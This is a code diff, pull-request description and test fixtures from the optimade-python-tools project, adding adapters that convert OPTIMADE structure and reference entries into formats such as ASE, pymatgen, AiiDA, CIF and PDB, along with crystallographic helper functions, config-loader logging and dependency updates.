+ For more info, see https://www.wwpdb.org/documentation/file-format-content/format33/sect8.html#SCALEn + """ + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + cell = np.asarray(cell) + + volume = np.dot(cell[0], np.cross(cell[1], cell[2])) + scale = [] + for i in range(3): + vector = np.cross(cell[(i + 1) % 3], cell[(i + 2) % 3]) / volume + scale.append(tuple(vector)) + return tuple(scale) + + +def fractional_coordinates( + cell: Tuple[Vector3D, Vector3D, Vector3D], cartesian_positions: List[Vector3D] +) -> List[Vector3D]: + """Returns fractional coordinates and wraps coordinates to be [0;1[ + + NOTE: Based on `ase.atoms:Atoms.get_scaled_positions()`. + """ + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + cell = np.asarray(cell) + cartesian_positions = np.asarray(cartesian_positions) + + fractional = np.linalg.solve(cell.T, cartesian_positions.T).T + + # Expecting a bulk 3D structure here, note, this may change in the future. + # See `ase.atoms:Atoms.get_scaled_positions()` for ideas on how to handle lower dimensional structures. + # Furthermore, according to ASE we need to modulo 1.0 twice. + # This seems to be due to small floats % 1.0 becomes 1.0, hence twice makes it 0.0. + for i in range(3): + fractional[:, i] %= 1.0 + fractional[:, i] %= 1.0 + + return [tuple(position) for position in fractional] + + +def cell_to_cellpar(cell, radians=False): + """Returns the cell parameters [a, b, c, alpha, beta, gamma]. + + Angles are in degrees unless radian=True is used. + + NOTE: Based on `ase.geometry.cell:cell_to_cellpar()`. 
+ """ + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + cell = np.asarray(cell) + + lengths = [np.linalg.norm(vector) for vector in cell] + angles = [] + for i in range(3): + j = i - 1 + k = i - 2 + outer_product = lengths[j] * lengths[k] + if outer_product > 1e-16: + x_vector = np.dot(cell[j], cell[k]) / outer_product + angle = 180.0 / np.pi * np.arccos(x_vector) + else: + angle = 90.0 + angles.append(angle) + if radians: + angles = [angle * np.pi / 180 for angle in angles] + return np.array(lengths + angles) + + +def unit_vector(x): + """Return a unit vector in the same direction as x.""" + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + y = np.array(x, dtype="float") + return y / np.linalg.norm(y) + + +def cellpar_to_cell(cellpar, ab_normal=(0, 0, 1), a_direction=None): + """Return a 3x3 cell matrix from cellpar=[a,b,c,alpha,beta,gamma]. + + Angles must be in degrees. + + The returned cell is orientated such that a and b + are normal to `ab_normal` and a is parallel to the projection of + `a_direction` in the a-b plane. + + Default `a_direction` is (1,0,0), unless this is parallel to + `ab_normal`, in which case default `a_direction` is (0,0,1). + + The returned cell has the vectors va, vb and vc along the rows. The + cell will be oriented such that va and vb are normal to `ab_normal` + and va will be along the projection of `a_direction` onto the a-b + plane. + + Example: + + >>> cell = cellpar_to_cell([1, 2, 4, 10, 20, 30], (0, 1, 1), (1, 2, 3)) + >>> np.round(cell, 3) + array([[ 0.816, -0.408, 0.408], + [ 1.992, -0.13 , 0.13 ], + [ 3.859, -0.745, 0.745]]) + + NOTE: Direct copy of `ase.geometry.cell:cellpar_to_cell()`. 
+ """ + if globals().get("np", None) is None: + warn(NUMPY_NOT_FOUND) + return None + + if a_direction is None: + if np.linalg.norm(np.cross(ab_normal, (1, 0, 0))) < 1e-5: + a_direction = (0, 0, 1) + else: + a_direction = (1, 0, 0) + + # Define rotated X,Y,Z-system, with Z along ab_normal and X along + # the projection of a_direction onto the normal plane of Z. + a_direction_array = np.array(a_direction) + Z = unit_vector(ab_normal) + X = unit_vector(a_direction_array - np.dot(a_direction_array, Z) * Z) + Y = np.cross(Z, X) + + # Express va, vb and vc in the X,Y,Z-system + alpha, beta, gamma = 90.0, 90.0, 90.0 + if isinstance(cellpar, (int, float)): + a = b = c = cellpar + elif len(cellpar) == 1: + a = b = c = cellpar[0] + elif len(cellpar) == 3: + a, b, c = cellpar + else: + a, b, c, alpha, beta, gamma = cellpar + + # Handle orthorhombic cells separately to avoid rounding errors + eps = 2 * np.spacing(90.0, dtype=np.float64) # around 1.4e-14 + # alpha + if abs(abs(alpha) - 90) < eps: + cos_alpha = 0.0 + else: + cos_alpha = np.cos(alpha * np.pi / 180.0) + # beta + if abs(abs(beta) - 90) < eps: + cos_beta = 0.0 + else: + cos_beta = np.cos(beta * np.pi / 180.0) + # gamma + if abs(gamma - 90) < eps: + cos_gamma = 0.0 + sin_gamma = 1.0 + elif abs(gamma + 90) < eps: + cos_gamma = 0.0 + sin_gamma = -1.0 + else: + cos_gamma = np.cos(gamma * np.pi / 180.0) + sin_gamma = np.sin(gamma * np.pi / 180.0) + + # Build the cell vectors + va = a * np.array([1, 0, 0]) + vb = b * np.array([cos_gamma, sin_gamma, 0]) + cx = cos_beta + cy = (cos_alpha - cos_beta * cos_gamma) / sin_gamma + cz_sqr = 1.0 - cx * cx - cy * cy + assert cz_sqr >= 0 + cz = np.sqrt(cz_sqr) + vc = c * np.array([cx, cy, cz]) + + # Convert to the Cartesian x,y,z-system + abc = np.vstack((va, vb, vc)) + T = np.vstack((X, Y, Z)) + cell = np.dot(abc, T) + + return cell + + +def _pad_iter_of_iters( + iterable: Iterable[Iterable], + padding: float = None, + outer: Iterable = None, + inner: Iterable = None, +) -> 
Tuple[Iterable[Iterable], bool]: + """Turn any null/None values into a float in given iterable of iterables""" + try: + padding = float(padding) + except (TypeError, ValueError): + padding = float("nan") + + outer = outer if outer is not None else list + inner = inner if outer is not None else tuple + + padded_iterable = any( + value is None for inner_iterable in iterable for value in inner_iterable + ) + + if padded_iterable: + padded_iterable_of_iterables = [] + for inner_iterable in iterable: + new_inner_iterable = inner( + value if value is not None else padding for value in inner_iterable + ) + padded_iterable_of_iterables.append(new_inner_iterable) + iterable = outer(padded_iterable_of_iterables) + + return iterable, padded_iterable + + +def pad_positions( + positions: List[Vector3D], padding: float = None +) -> Tuple[List[Vector3D], bool]: + """Turn any null/None values into a float in given list of positions""" + return _pad_iter_of_iters( + iterable=positions, padding=padding, outer=list, inner=tuple, + ) + + +def pad_cell( + lattice_vectors: Tuple[Vector3D, Vector3D, Vector3D], padding: float = None +) -> Tuple[Tuple[Vector3D, Vector3D, Vector3D], bool]: + """Turn any null/None values into a float in given tuple of lattice_vectors""" + return _pad_iter_of_iters( + iterable=lattice_vectors, padding=padding, outer=tuple, inner=tuple, + ) diff --git a/optimade/server/config.py b/optimade/server/config.py index 30db5dfb..078d9cbb 100644 --- a/optimade/server/config.py +++ b/optimade/server/config.py @@ -1,5 +1,6 @@ # pylint: disable=no-self-argument import json +import logging from typing import Optional, Dict, List try: @@ -15,6 +16,7 @@ from optimade.models import Implementation, Provider DEFAULT_CONFIG_FILE_PATH = str(Path.home().joinpath(".optimade.json")) +logger = logging.getLogger("optimade") class NoFallback(Exception): @@ -109,7 +111,7 @@ class ServerConfig(BaseSettings): ) @root_validator(pre=True) - def load_default_settings(cls, values): + def 
load_default_settings(cls, values): # pylint: disable=no-self-argument """ Loads settings from a root file if available and uses that as defaults in place of built in defaults @@ -119,8 +121,13 @@ class ServerConfig(BaseSettings): new_values = {} if config_file_path.exists() and config_file_path.is_file(): + logger.debug("Found config file at: %s", config_file_path) with open(config_file_path) as f: new_values = json.load(f) + else: + logger.debug( # pragma: no cover + "Did not find config file at: %s", config_file_path + ) new_values.update(values) diff --git a/setup.py b/setup.py index 0a59ced8..1ec8576b 100644 --- a/setup.py +++ b/setup.py @@ -4,19 +4,30 @@ from setuptools import setup, find_packages module_dir = Path(__file__).resolve().parent # Dependencies -mongo_deps = ["pymongo~=3.10", "mongomock~=3.19"] -server_deps = ["uvicorn", "Jinja2~=2.11"] + mongo_deps +# Server minded django_deps = ["django>=2.2.9,<4.0"] elastic_deps = ["elasticsearch-dsl>=6.4,<8.0"] +mongo_deps = ["pymongo~=3.10", "mongomock~=3.19"] +server_deps = ["uvicorn", "Jinja2~=2.11"] + mongo_deps + +# Client minded +aiida_deps = ["aiida-core~=1.1"] +ase_deps = ["ase~=3.19"] +cif_deps = ["numpy~=1.18"] +pdb_deps = cif_deps +pymatgen_deps = ["pymatgen~=2020.3"] +client_deps = cif_deps + +# General testing_deps = [ - "pytest~=5.3", + "pytest~=5.4", "pytest-cov", "codecov", "openapi-spec-validator", "jsondiff", ] + server_deps -dev_deps = ["pylint", "black", "pre-commit", "invoke"] + testing_deps -all_deps = dev_deps + django_deps + elastic_deps +dev_deps = ["pylint", "black", "pre-commit", "invoke"] + testing_deps + client_deps +all_deps = dev_deps + django_deps + elastic_deps + aiida_deps + ase_deps + pymatgen_deps setup( name="optimade", @@ -44,8 +55,8 @@ setup( ], python_requires=">=3.6", install_requires=[ - "lark-parser~=0.8.1", - "fastapi~=0.52", + "lark-parser~=0.8.5", + "fastapi~=0.53", "pydantic~=1.4", "email_validator", "requests~=2.23", @@ -54,11 +65,17 @@ setup( extras_require={ 
"all": all_deps, "dev": dev_deps, - "server": server_deps, "testing": testing_deps, + "server": server_deps, + "client": client_deps, "django": django_deps, "elastic": elastic_deps, "mongo": mongo_deps, + "aiida": aiida_deps, + "ase": ase_deps, + "cif": cif_deps, + "pdb": pdb_deps, + "pymatgen": pymatgen_deps, }, entry_points={ "console_scripts": ["optimade_validator=optimade.validator:validate"]
Add adapters - Base design + 'structures' (+ 'references'... sort of) The goal of the adapters is to contain a conversion or adaptation ability in a single Python class. The class will be a proxy for `optimade.models.EntryResource`, where the specific entries will take the place, e.g., `StructureResource`. In this way, one can instatiate the adapter class with a JSON resource object matching it, and get all the properties as attributes. E.g., one could get the lattice vectors of a structure then by calling `structures_adapter_class_object.attributes.lattice_vectors`. The reason to not have the adapter class be a direct link or subclass of the model class, is to not inherit all that comes with it, i.e., do not inherit `pyndantic`'s `BaseModel`, etc. While it can trip most IDEs, it is a more elegant solution that opens the doors to other possibilities, in my opinion. Besides being a handy wrapper for an entity resource object for a client, it also serves as a converter/adapter to other known and widely used libraries for the specific entity type. For a structures resource object, this may be libraries such as pymatgen, ASE, AiiDA, etc... It may also be nice to be able to convert the structures resource object to a Crystallographic Information File (CIF) file or other. These adapter/conversion functions may be added in a separate file and then referenced in the adapter class. Thus, the adapter class stays small at first glance, but spreads its tentacles wide throughout both the current package, but also a multitude of other libraries, packages, and data formats. In general, whenever the adapter class tries to get an attribute, it goes through the following steps: 1. If the attribute starts with `get_`, try to look up if this is a known conversion, then perform the conversion and return it as a string or specific package/library Python class. 2. Try to fetch the OPTIMADE model property. 3. 
Raise AttributeError if the attribute is still unknown, i.e., the previous steps failed and didn't raise already. --- Missing parts of this PR: - Add tests: - [X] General tests for the adapter class. - Tests for each converter function: - [x] AiiDA - [x] ASE - [x] CIF - [x] PDB - [x] PDBx/mmCIF - [x] pymatgen - [x] Generalize the adapter main class and have `Structure` inherit from it. - [x] Add `Reference`. (Currently added as an empty inheritence, meaning there are currently no conversions available for `Reference`). Helpful additions/corrections to this PR: - Optimize the various conversion functions (especially `get_cif` and `get_pbdx_mmcif`). - Add more well-known or much used data format converters and packages/libraries. (Keeping in mind that some of these libraries have a large quantity of converters already, e.g., ASE already converts to PDB and CIF formats, and so therefore these should only be included if going through, e.g., ASE, may end in a loss of data - I may not have been entirely strict enough with this myself already 😅).
**Title** Add unified entry adapters, conversion utilities, and CI support for optional scientific libraries **Problem** The package needed a consistent way to expose OPTIMADE resources as objects from popular scientific libraries (e.g., AiiDA, ASE, CIF, PDB, pymatgen). Without a proper adapter layer the conversions were unavailable, and the continuous‑integration pipelines never exercised them, leaving potential import‑time failures undetected. Additionally, the server configuration loader gave no feedback when a user‑config file was missing. **Root Cause** Conversion logic was added without a generic adapter base, without exposing it through the public API, and without preparing the test environment for the optional back‑ends. CI only installed a minimal set of dependencies and provisioned MongoDB, so imports of heavy optional packages failed silently. The config loader swallowed missing‑file situations without logging. **Fix / Expected Behavior** - Introduce a lazy base adapter that proxies an OPTIMADE entry, handles attribute access, and performs on‑demand conversion via `as_<format>` calls. - Provide concrete adapters for *Structure* and *Reference* resources, each registering conversion functions for AiiDA, ASE, CIF, PDB/PDBx‑mmCIF, and pymatgen. - Ensure conversion functions raise a clear `ConversionError` when the required external library is not installed. - Export the new adapters through the package’s public namespace. - Add an AiiDA profile template and a small setup script to create a temporary AiiDA environment for testing. - Extend CI workflows: start a PostgreSQL service, install all optional dependencies eagerly, run the newly added adapter tests, and update dependency versions (lark‑parser, fastapi, pytest, etc.). - Add debug logging to the server configuration loader and emit a message when the configuration file cannot be found. 
**Risk & Validation** - Optional heavy dependencies increase installation time; eager installation is confined to CI, while normal installs remain unchanged. - Conversion functions may emit warnings when libraries are absent; unit tests verify correct handling of both present and missing dependencies. - CI now includes additional services (PostgreSQL) and runs the adapter test suite; successful CI runs and unchanged existing test coverage confirm the change’s safety.
241
Materials-Consortia/optimade-python-tools
diff --git a/pytest.ini b/pytest.ini index 9628d74e..a04215eb 100644 --- a/pytest.ini +++ b/pytest.ini @@ -4,3 +4,4 @@ filterwarnings = ignore:.*"@coroutine" decorator is deprecated since Python 3.8, use "async def" instead.*:DeprecationWarning ignore:.*Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated.*:DeprecationWarning ignore:.*the imp module is deprecated in favour of importlib.*:DeprecationWarning + ignore:.*not found, cannot convert structure.*:UserWarning diff --git a/tests/adapters/references/conftest.py b/tests/adapters/references/conftest.py new file mode 100644 index 00000000..52fbe3f3 --- /dev/null +++ b/tests/adapters/references/conftest.py @@ -0,0 +1,28 @@ +import json +from pathlib import Path +from random import choice + +import pytest + +from optimade.adapters.references import Reference + + +@pytest.fixture +def RAW_REFERENCES(): + """Read and return raw_references.json""" + with open( + Path(__file__).parent.joinpath("raw_test_references.json"), "r" + ) as raw_data: + return json.load(raw_data) + + +@pytest.fixture +def raw_reference(RAW_REFERENCES): + """Return random raw reference from raw_references.json""" + return choice(RAW_REFERENCES) + + +@pytest.fixture +def reference(raw_reference): + """Create and return adapters.Reference""" + return Reference(raw_reference) diff --git a/tests/adapters/references/raw_test_references.json b/tests/adapters/references/raw_test_references.json new file mode 100644 index 00000000..a3f46d81 --- /dev/null +++ b/tests/adapters/references/raw_test_references.json @@ -0,0 +1,56 @@ +[ + { + "id": "dijkstra1968", + "type": "references", + "attributes": { + "last_modified": "2019-11-12T14:24:37.331000", + "authors": [ + { + "name": "Edsger W. 
Dijkstra", + "firstname": "Edsger", + "lastname": "Dijkstra" + } + ], + "doi": "10.1145/362929.362947", + "journal": "Communications of the ACM", + "title": "Go To Statement Considered Harmful", + "year": "1968" + } + }, + { + "id": "maddox1988", + "type": "references", + "attributes": { + "last_modified": "2019-11-27T14:24:37.331000", + "authors": [ + { + "name": "John Maddox", + "firstname": "John", + "lastname": "Maddox" + } + ], + "doi": "10.1038/335201a0", + "journal": "Nature", + "title": "Crystals From First Principles", + "year": "1988" + } + }, + { + "id": "dummy/2019", + "type": "references", + "attributes": { + "last_modified": "2019-11-23T14:24:37.332000", + "authors": [ + { + "name": "A Nother", + "firstname": "A", + "lastname": "Nother" + } + ], + "doi": "10.1038/00000", + "journal": "JACS", + "title": "Dummy reference that should remain orphaned from all structures for testing purposes", + "year": "2019" + } + } +] \ No newline at end of file diff --git a/tests/adapters/references/test_references.py b/tests/adapters/references/test_references.py new file mode 100644 index 00000000..aa18871d --- /dev/null +++ b/tests/adapters/references/test_references.py @@ -0,0 +1,86 @@ +import pytest + +from optimade.adapters import Reference +from optimade.models import ReferenceResource + + +class TestReference: + """Test Reference adapter""" + + def test_instantiate(self, RAW_REFERENCES): + """Try instantiating Reference for all raw test references""" + for reference in RAW_REFERENCES: + new_Reference = Reference(reference) + assert isinstance(new_Reference.entry, ReferenceResource) + + def test_setting_entry(self, capfd, RAW_REFERENCES): + """Make sure entry can only be set once""" + reference = Reference(RAW_REFERENCES[0]) + reference.entry = RAW_REFERENCES[1] + captured = capfd.readouterr() + assert "entry can only be set once and is already set." 
in captured.out + + @pytest.mark.skip( + "Currently, there are no conversion types available for references" + ) + def test_convert(self, reference): + """Test convert() works + Choose currently known entry type - must be updated if no longer available. + """ + if not reference._type_converters: + pytest.fail("_type_converters is seemingly empty. This should not be.") + + chosen_type = "SOME_VALID_TYPE" + if chosen_type not in reference._type_converters: + pytest.fail( + f"{chosen_type} not found in _type_converters: {reference._type_converters} - " + "please update test tests/adapters/references/test_references.py:TestReference." + "test_convert()" + ) + + converted_reference = reference.convert(chosen_type) + assert isinstance(converted_reference, (str, None.__class__)) + assert converted_reference == reference._converted[chosen_type] + + def test_convert_wrong_format(self, reference): + """Test AttributeError is raised if format does not exist""" + nonexistant_format = 0 + right_wrong_format_found = False + while not right_wrong_format_found: + if str(nonexistant_format) not in reference._type_converters: + nonexistant_format = str(nonexistant_format) + right_wrong_format_found = True + else: + nonexistant_format += 1 + + with pytest.raises( + AttributeError, + match=f"Non-valid entry type to convert to: {nonexistant_format}", + ): + reference.convert(nonexistant_format) + + def test_getattr_order(self, reference): + """The order of getting an attribute should be: + 1. `as_<entry type format>` + 2. `<entry type attribute>` + 3. `<entry type attributes attributes>` + 3. 
`raise AttributeError with custom message` + """ + # If passing attribute starting with `as_`, it should call `self.convert()` + with pytest.raises( + AttributeError, match=f"Non-valid entry type to convert to: " + ): + reference.as_ + + # If passing valid ReferenceResource attribute, it should return said attribute + for attribute, attribute_type in ( + ("id", str), + ("authors", list), + ("attributes.authors", list), + ): + assert isinstance(getattr(reference, attribute), attribute_type) + + # Otherwise, it should raise AttributeError + for attribute in ("nonexistant_attribute", "attributes.nonexistant_attribute"): + with pytest.raises(AttributeError, match=f"Unknown attribute: {attribute}"): + getattr(reference, attribute) diff --git a/tests/adapters/structures/__init__.py b/tests/adapters/structures/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/tests/adapters/structures/conftest.py b/tests/adapters/structures/conftest.py new file mode 100644 index 00000000..72b51434 --- /dev/null +++ b/tests/adapters/structures/conftest.py @@ -0,0 +1,64 @@ +import json +from pathlib import Path +from random import choice +from typing import List + +import pytest + +from optimade.adapters.structures import Structure + + +@pytest.fixture +def RAW_STRUCTURES() -> List[dict]: + """Read and return raw_structures.json""" + with open( + Path(__file__).parent.joinpath("raw_test_structures.json"), "r" + ) as raw_data: + return json.load(raw_data) + + +@pytest.fixture +def SPECIAL_SPECIES_STRUCTURES() -> List[dict]: + """Read and return special_species.json""" + with open(Path(__file__).parent.joinpath("special_species.json"), "r") as raw_data: + return json.load(raw_data) + + +@pytest.fixture +def raw_structure(RAW_STRUCTURES) -> dict: + """Return random raw structure from raw_structures.json""" + return choice(RAW_STRUCTURES) + + +@pytest.fixture +def structure(raw_structure) -> Structure: + """Create and return adapters.Structure""" + return 
Structure(raw_structure) + + +@pytest.fixture +def structures(RAW_STRUCTURES) -> List[Structure]: + """Create and return list of adapters.Structure""" + return [Structure(_) for _ in RAW_STRUCTURES] + + +@pytest.fixture +def null_position_structure(raw_structure) -> Structure: + """Create and return adapters.Structure with sites that have None values""" + raw_structure["attributes"]["cartesian_site_positions"][0] = [None] * 3 + if "structure_features" in raw_structure["attributes"]: + if "unknown_positions" not in raw_structure["attributes"]["structure_features"]: + raw_structure["attributes"]["structure_features"].append( + "unknown_positions" + ) + else: + raw_structure["attributes"]["structure_feature"] = ["unknown_positions"] + return Structure(raw_structure) + + +@pytest.fixture +def null_lattice_vector_structure(raw_structure) -> Structure: + """Create and return adapters.Structure with lattice_vectors that have None values""" + raw_structure["attributes"]["lattice_vectors"][0] = [None] * 3 + raw_structure["attributes"]["dimension_types"][0] = 0 + return Structure(raw_structure) diff --git a/tests/adapters/structures/raw_test_structures.json b/tests/adapters/structures/raw_test_structures.json new file mode 100644 index 00000000..00e0a391 --- /dev/null +++ b/tests/adapters/structures/raw_test_structures.json @@ -0,0 +1,3695 @@ +[ + { + "id": "mpf_1", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.331000", + "elements": [ + "Ac" + ], + "nelements": 1, + "elements_ratios": [ + 1 + ], + "chemical_formula_descriptive": "Ac", + "chemical_formula_reduced": "Ac", + "chemical_formula_anonymous": "A", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 1.2503264826932692, + 0, + 0 + ], + [ + 0, + 9.888509716321765, + 0 + ], + [ + 0, + 0, + 0.2972637673241818 + ] + ], + "cartesian_site_positions": [ + [ + 0.17570227444196573, + 0.17570227444196573, + 0.17570227444196573 + ] + ], + "nsites": 1, + "species_at_sites": 
[ + "Ac" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac" + }, + "relationships": { + "references": { + "data": [ + { + "id": "dijkstra1968", + "type": "references" + } + ] + } + } + }, + { + "id": "mpf_2", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.331000", + "elements": [ + "Ac", + "Ag", + "Ir" + ], + "nelements": 3, + "elements_ratios": [ + 0.5, + 0.25, + 0.25 + ], + "chemical_formula_descriptive": "Ac2AgIr", + "chemical_formula_reduced": "Ac2AgIr", + "chemical_formula_anonymous": "A2BC", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 8.79234151692028, + 0, + 0 + ], + [ + 0, + 2.7335844428185343, + 0 + ], + [ + 0, + 0, + 6.350176421077278 + ] + ], + "cartesian_site_positions": [ + [ + 0.2096302780439051, + 0.2096302780439051, + 0.2096302780439051 + ], + [ + 0.2096302780439051, + 0.2096302780439051, + 0.2096302780439051 + ], + [ + 0.2096302780439051, + 0.2096302780439051, + 0.2096302780439051 + ], + [ + 0.2096302780439051, + 0.2096302780439051, + 0.2096302780439051 + ] + ], + "nsites": 4, + "species_at_sites": [ + "Ac", + "Ac", + "Ag", + "Ir" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ir", + "chemical_symbols": [ + "Ir" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac-Ag-Ir" + }, + "relationships": { + "references": { + "data": [ + { + "id": "dijkstra1968", + "type": "references" + } + ] + } + } + }, + { + "id": "mpf_3", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.331000", + "elements": [ + "Ac", + "Ag", + "Pb" + ], + "nelements": 3, + "elements_ratios": [ + 0.5, + 0.25, + 0.25 + ], + "chemical_formula_descriptive": "Ac2AgPb", + 
"chemical_formula_reduced": "Ac2AgPb", + "chemical_formula_anonymous": "A2BC", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 7.698325441636717, + 0, + 0 + ], + [ + 0, + 3.9419030762941096, + 0 + ], + [ + 0, + 0, + 0.5746646140691603 + ] + ], + "cartesian_site_positions": [ + [ + 0.6522459815095935, + 0.6522459815095935, + 0.6522459815095935 + ], + [ + 0.6522459815095935, + 0.6522459815095935, + 0.6522459815095935 + ], + [ + 0.6522459815095935, + 0.6522459815095935, + 0.6522459815095935 + ], + [ + 0.6522459815095935, + 0.6522459815095935, + 0.6522459815095935 + ] + ], + "nsites": 4, + "species_at_sites": [ + "Ac", + "Ac", + "Ag", + "Pb" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Pb", + "chemical_symbols": [ + "Pb" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac-Ag-Pb" + }, + "relationships": { + "references": { + "data": [ + { + "id": "maddox1988", + "type": "references" + } + ] + } + } + }, + { + "id": "mpf_23", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.335000", + "elements": [ + "Ac", + "Mg" + ], + "nelements": 2, + "elements_ratios": [ + 0.6666666666666666, + 0.3333333333333333 + ], + "chemical_formula_descriptive": "Ac2Mg", + "chemical_formula_reduced": "Ac2Mg", + "chemical_formula_anonymous": "A2B", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 1.2755343366952576, + 0, + 0 + ], + [ + 0, + 5.82414982265072, + 0 + ], + [ + 0, + 0, + 0.8392960659156112 + ] + ], + "cartesian_site_positions": [ + [ + 0.5399745988507391, + 0.5399745988507391, + 0.5399745988507391 + ], + [ + 0.5399745988507391, + 0.5399745988507391, + 0.5399745988507391 + ], + [ + 0.5399745988507391, + 0.5399745988507391, + 0.5399745988507391 + ] + ], + "nsites": 3, + "species_at_sites": [ + "Ac", 
+ "Ac", + "Mg" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Mg", + "chemical_symbols": [ + "Mg" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac-Mg" + } + }, + { + "id": "mpf_30", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.337000", + "elements": [ + "Ac", + "O" + ], + "nelements": 2, + "elements_ratios": [ + 0.4, + 0.6 + ], + "chemical_formula_descriptive": "Ac2O3", + "chemical_formula_reduced": "Ac2O3", + "chemical_formula_anonymous": "A3B2", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 5.270508031864836, + 0, + 0 + ], + [ + 0, + 7.390955992107494, + 0 + ], + [ + 0, + 0, + 3.0995955580253574 + ] + ], + "cartesian_site_positions": [ + [ + 0.15817967032742697, + 0.15817967032742697, + 0.15817967032742697 + ], + [ + 0.15817967032742697, + 0.15817967032742697, + 0.15817967032742697 + ], + [ + 0.15817967032742697, + 0.15817967032742697, + 0.15817967032742697 + ], + [ + 0.15817967032742697, + 0.15817967032742697, + 0.15817967032742697 + ], + [ + 0.15817967032742697, + 0.15817967032742697, + 0.15817967032742697 + ] + ], + "nsites": 5, + "species_at_sites": [ + "Ac", + "Ac", + "O", + "O", + "O" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac-O" + } + }, + { + "id": "mpf_110", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.351000", + "elements": [ + "Ac", + "Cu", + "F", + "O" + ], + "nelements": 4, + "elements_ratios": [ + 0.2, + 0.2, + 0.2, + 0.4 + ], + "chemical_formula_descriptive": "AcCuO2F", + "chemical_formula_reduced": "AcCuO2F", + "chemical_formula_anonymous": "A2BCD", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 
8.877504144188517, + 0, + 0 + ], + [ + 0, + 6.281098675533934, + 0 + ], + [ + 0, + 0, + 0.9199940132786888 + ] + ], + "cartesian_site_positions": [ + [ + 0.27842674271448375, + 0.27842674271448375, + 0.27842674271448375 + ], + [ + 0.27842674271448375, + 0.27842674271448375, + 0.27842674271448375 + ], + [ + 0.27842674271448375, + 0.27842674271448375, + 0.27842674271448375 + ], + [ + 0.27842674271448375, + 0.27842674271448375, + 0.27842674271448375 + ], + [ + 0.27842674271448375, + 0.27842674271448375, + 0.27842674271448375 + ] + ], + "nsites": 5, + "species_at_sites": [ + "Ac", + "Cu", + "F", + "O", + "O" + ], + "species": [ + { + "name": "Ac", + "chemical_symbols": [ + "Ac" + ], + "concentration": [ + 1 + ] + }, + { + "name": "Cu", + "chemical_symbols": [ + "Cu" + ], + "concentration": [ + 1 + ] + }, + { + "name": "F", + "chemical_symbols": [ + "F" + ], + "concentration": [ + 1 + ] + }, + { + "name": "O", + "chemical_symbols": [ + "O" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ac-Cu-F-O" + } + }, + { + "id": "mpf_200", + "type": "structures", + "attributes": { + "last_modified": "2019-06-08T05:13:37.365000", + "elements": [ + "Ag" + ], + "nelements": 1, + "elements_ratios": [ + 1 + ], + "chemical_formula_descriptive": "Ag", + "chemical_formula_reduced": "Ag", + "chemical_formula_anonymous": "A", + "dimension_types": [ + 1, + 1, + 1 + ], + "lattice_vectors": [ + [ + 9.637799319633432, + 0, + 0 + ], + [ + 0, + 6.587212108623569, + 0 + ], + [ + 0, + 0, + 9.773065370403186 + ] + ], + "cartesian_site_positions": [ + [ + 0.06033221863150484, + 0.06033221863150484, + 0.06033221863150484 + ] + ], + "nsites": 1, + "species_at_sites": [ + "Ag" + ], + "species": [ + { + "name": "Ag", + "chemical_symbols": [ + "Ag" + ], + "concentration": [ + 1 + ] + } + ], + "structure_features": [], + "_exmpl_chemsys": "Ag" + } + }, + { + "id": "mpf_220", + "type": "structures", + "attributes": { + "last_modified": 
